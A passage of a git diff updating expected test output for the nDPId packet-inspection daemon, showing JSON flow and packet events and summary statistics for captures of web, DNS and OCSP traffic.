+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":864,"source":"ocs.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652842628,"flow_last_seen":1449652842628,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652842628,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.210","src_port":42590,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":864,"source":"ocs.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1449652842628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652842628,"pkt":"RQAAPD8ZQABABgMtwKi0ArL40NKmXgBQrzCnYwAAAACgAjkIgJAAAAIEBbQEAggKADWYegAAAAABAwMG"} +00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":865,"source":"ocs.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1449652842700,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652842700,"pkt":"RQAAND8aQABABgM0wKi0ArL40NKmXgBQrzCnZDkypeeAEADlhQYAAAEBCAoANZiCGkFpBQ=="} 
+00649{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":866,"source":"ocs.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1449652842701,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":204,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":204,"pkt_l4_len":184,"thread_ts_msec":1449652842701,"pkt":"RQAAzD8bQABABgKbwKi0ArL40NKmXgBQrzCnZDkypeeAGADlkB4AAAEBCAoANZiCGkFpBUdFVCAvZGF0YV9wbGF0ZWZvcm1lL3Byb2dyYW0vMTg0OTYvdHZfZGV0YWlsX21vcnRkdW5wb3VydzAwMTIyMzZfNzJmNmMuanBnIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCkhvc3Q6IHd3dy5vY3MuZnINCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +00805{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":866,"source":"ocs.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652842628,"flow_last_seen":1449652842701,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1449652842701,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.210","src_port":42590,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCS","breed":"Fun","category":"Media"},"http": {"hostname":"www.ocs.fr","url":"www.ocs.fr\/data_plateforme\/program\/18496\/tv_detail_mortdunpourw0012236_72f6c.jpg","code":0,"content_type":"","user_agent":""}} 
+00813{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":895,"source":"ocs.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1449652842628,"flow_last_seen":1449652843470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1449652843470,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.210","src_port":42590,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCS","breed":"Fun","category":"Media"},"http": {"hostname":"www.ocs.fr","url":"www.ocs.fr\/data_plateforme\/program\/18496\/tv_detail_mortdunpourw0012236_72f6c.jpg","code":0,"content_type":"","user_agent":""}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":83,"flow_first_seen":1449652842628,"flow_last_seen":1449652846380,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.210","src_port":42590,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCS","breed":"Fun","category":"Media"}} 
+00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1449652786395,"flow_last_seen":1449652787578,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"137.135.129.206","src_port":44959,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1449652787596,"flow_last_seen":1449652818681,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"137.135.131.52","src_port":46166,"dst_port":5122,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Azure","breed":"Acceptable","category":"Cloud"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1449652787596,"flow_last_seen":1449652818681,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"137.135.131.52","src_port":46166,"dst_port":5122,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} 
+00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1449652784341,"flow_last_seen":1449652792355,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.184.188","src_port":47699,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1449652784341,"flow_last_seen":1449652792355,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.184.188","src_port":47699,"dst_port":5228,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1449652786152,"flow_last_seen":1449652788767,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1683,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"23.21.230.199","src_port":39263,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} 
+00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1449652786167,"flow_last_seen":1449652786398,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"137.135.129.206","src_port":53356,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1449652788109,"flow_last_seen":1449652791955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5041,"flow_avg_l4_payload_len":252,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":36680,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652788016,"flow_last_seen":1449652788016,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":2589,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1449652797357,"flow_last_seen":1449652797774,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1235,"flow_tot_l4_payload_len":1580,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.184.188","src_port":32946,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00674{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":751,"flow_first_seen":1449652787983,"flow_last_seen":1449652839371,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":49881,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCS","breed":"Fun","category":"Media"}} +00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786098,"flow_last_seen":1449652786098,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":40097,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 
+00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786130,"flow_last_seen":1449652786130,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":1291,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1449652786135,"flow_last_seen":1449652787495,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":772,"flow_tot_l4_payload_len":772,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":48250,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1449652787003,"flow_last_seen":1449652787811,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":373,"flow_tot_l4_payload_len":728,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"216.58.208.46","src_port":41223,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} 
+00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1449652798305,"flow_last_seen":1449652798887,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":952,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.166.95","src_port":47803,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652798230,"flow_last_seen":1449652798230,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":11793,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652787507,"flow_last_seen":1449652787507,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":3621,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 
+00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786071,"flow_last_seen":1449652786071,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":38472,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786934,"flow_last_seen":1449652786934,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":48770,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652842535,"flow_last_seen":1449652842535,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":24245,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 
+00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","packets-captured":946,"packets-processed":946,"total-skipped-flows":0,"total-l4-data-len":12361,"total-not-detected-flows":0,"total-guessed-flows":2,"total-detected-flows":18,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":20,"total-idle-flows":20,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":108,"global_ts_msec":1449652846380} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ -~~ packets captured/processed: 946/0 +~~ packets captured/processed: 946/946 ~~ skipped flows.............: 0 -~~ total layer4 data length..: 0 bytes -~~ total detected protocols..: 0 -~~ total active/idle flows...: 0/0 +~~ total layer4 data length..: 12361 bytes +~~ total detected protocols..: 18 +~~ total active/idle flows...: 20/20 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5099937 bytes -~~ total memory freed........: 5099937 bytes -~~ total allocations/frees...: 113310/113310 +~~ total memory allocated....: 5155535 bytes +~~ total memory freed........: 5155535 bytes +~~ total allocations/frees...: 114329/114329 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ json string min len.......: 174 chars -~~ json string max len.......: 2208 chars -~~ json string avg len.......: 1191 chars +~~ json string min len.......: 449 chars +~~ json string max len.......: 1481 chars +~~ json string avg len.......: 965 chars diff --git a/test/results/ocsp.pcapng.out b/test/results/ocsp.pcapng.out index f81b5a9ba..e2d8ed631 100644 --- a/test/results/ocsp.pcapng.out +++ b/test/results/ocsp.pcapng.out 
@@ -1,69 +1,69 @@ 00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ocsp.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ocsp.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1623221248283} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623221248283,"flow_last_seen":1623221248283,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623221248283,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"109.70.240.130","src_port":49813,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1623221248283,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623221248283,"pkt":"pJGxgjQ56CrqthSFCABFAAA07YhAAIAG7ObAqAHjbUbwgsKVAFBAnkIeAAAAAIAC+vAOKQAAAgQFtAEDAwgBAQQCGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARhcrEQ=="} -00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1623221248292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":114,"pkt_l4_len":28,"thread_ts_msec":1623221248292,"pkt":"6CrqthSFpJGxgjQ5CABFAAAwAABAADUGJXRtRvCCwKgB4wBQwpWhnw3QQJ5CH3ASOQg1lwAAAgQFtAEDAwkZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx3fu3"} -00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1623221248311,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":20,"thread_ts_msec":1623221248311,"pkt":"pJGxgjQ56CrqthSFCABFAAAo7YlAAIAG7PHAqAHjbUbwgsKVAFBAnkIfoZ8N0VAQAgGYawAAAAAAAAAAGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAjLK1pA=="} 
-00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623221248283,"flow_last_seen":1623221248318,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":385,"flow_tot_l4_payload_len":385,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1623221248318,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"109.70.240.130","src_port":49813,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"ocsp07.actalis.it","url":"ocsp07.actalis.it\/VA\/AUTH-ROOT\/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSw4x5v4bTlizjNRmTdkYSy7q0R9gQUUtiIOsifeGbtifN7OHCUyQICNtACEEWXMtjzGMt1k6L0aA%2BQ6tk%3D","code":0,"content_type":"","user_agent":"Microsoft-CryptoAPI\/10.0"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623221248283,"flow_last_seen":1623221248283,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623221248283,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"109.70.240.130","src_port":49813,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1623221248283,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623221248283,"pkt":"pJGxgjQ56CrqthSFCABFAAA07YhAAIAG7ObAqAHjbUbwgsKVAFBAnkIeAAAAAIAC+vAOKQAAAgQFtAEDAwgBAQQCGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARhcrEQ=="} +00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1623221248292,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":114,"pkt_l4_len":28,"thread_ts_msec":1623221248292,"pkt":"6CrqthSFpJGxgjQ5CABFAAAwAABAADUGJXRtRvCCwKgB4wBQwpWhnw3QQJ5CH3ASOQg1lwAAAgQFtAEDAwkZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx3fu3"} +00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1623221248311,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":20,"thread_ts_msec":1623221248311,"pkt":"pJGxgjQ56CrqthSFCABFAAAo7YlAAIAG7PHAqAHjbUbwgsKVAFBAnkIfoZ8N0VAQAgGYawAAAAAAAAAAGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAjLK1pA=="} 
+00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623221248283,"flow_last_seen":1623221248318,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":385,"flow_tot_l4_payload_len":385,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1623221248318,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"109.70.240.130","src_port":49813,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"ocsp07.actalis.it","url":"ocsp07.actalis.it\/VA\/AUTH-ROOT\/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSw4x5v4bTlizjNRmTdkYSy7q0R9gQUUtiIOsifeGbtifN7OHCUyQICNtACEEWXMtjzGMt1k6L0aA%2BQ6tk%3D","code":0,"content_type":"","user_agent":"Microsoft-CryptoAPI\/10.0"}} 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":24,"source":"ocsp.pcapng","alias":"nDPId-test","packets-captured":24,"packets-processed":23,"total-skipped-flows":0,"total-l4-data-len":8359,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1623222699655} 
